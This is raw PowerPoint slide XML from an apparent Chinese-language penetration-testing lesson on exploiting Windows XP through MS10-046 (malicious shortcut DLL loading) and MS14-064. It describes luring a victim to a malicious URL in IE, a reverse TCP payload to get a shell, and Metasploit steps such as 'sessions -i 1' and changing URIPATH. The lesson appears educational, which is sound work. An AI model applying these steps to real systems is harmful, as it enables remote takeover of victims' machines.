                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ms10_046</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>xindows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>系统</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53719B93-4129-9449-63CF-6339D4C16B99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="310577" y="1867461"/>
            <a:ext cx="11594646" cy="2792239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ms10_046_shortcut_icon_dllloader是Windows操作系统中的一个漏洞，其成因是在处理Windows快捷方式(.lnk)文件时存在一个安全漏洞。在处理具有特制图标资源的快捷方式时，Windows会加载并执行位于快捷方式目标路径下的DLL文件。然而，由于缺乏适当的安全检查，攻击者可以通过制作恶意的快捷方式来执行恶意的DLL文件，从而实现远程代码执行攻击。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7820F4A-06EE-40E1-758A-91ED9CAFF952}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432707" y="4619759"/>
            <a:ext cx="11323864" cy="2238241"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>       MS10_046</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>通过触发浏览器的漏洞来进行对目标系统的这样的一个攻击，需要我们构造一个恶意的这样的一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，让目标系统能够通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>浏览器进行点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>这里使用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>reserve_TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>就是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>可以实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>端口反弹这样的一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，通过这样的方式来获取目标系统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1045C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7198332"/>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9A35C9E-D8A7-E6D3-476A-BCBA76CFA66E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3105658" y="1249285"/>
            <a:ext cx="8529318" cy="5062206"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="197708" y="1249285"/>
            <a:ext cx="2780270" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>进入控制会话</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1045C9"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sessions –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1045C9"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>可以跟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>保持多个会话。如果我们攻陷了多台主机，我们可以有多个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>会话、跟他们交互、在他们之间切换，或是将他们逐个关掉。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D3C85EA-3D33-2723-8548-564375DEED98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4308942" y="3595524"/>
            <a:ext cx="7830506" cy="3176716"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9971C1F-7FA4-CB24-BAAE-89425E7FCB22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="197708" y="5895534"/>
            <a:ext cx="7877502" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>端口号占用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> stop apache2 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3005391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17562C14-B2DD-9BD5-48AB-5A04AAC44E7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="355600" y="874712"/>
            <a:ext cx="10515600" cy="1325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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MS14-064</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>远程代码执行漏洞攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>windows XP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{035C58D6-E274-2254-5047-0B4AA31B0460}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431800" y="4441049"/>
            <a:ext cx="3746014" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>URIPATH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>网址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
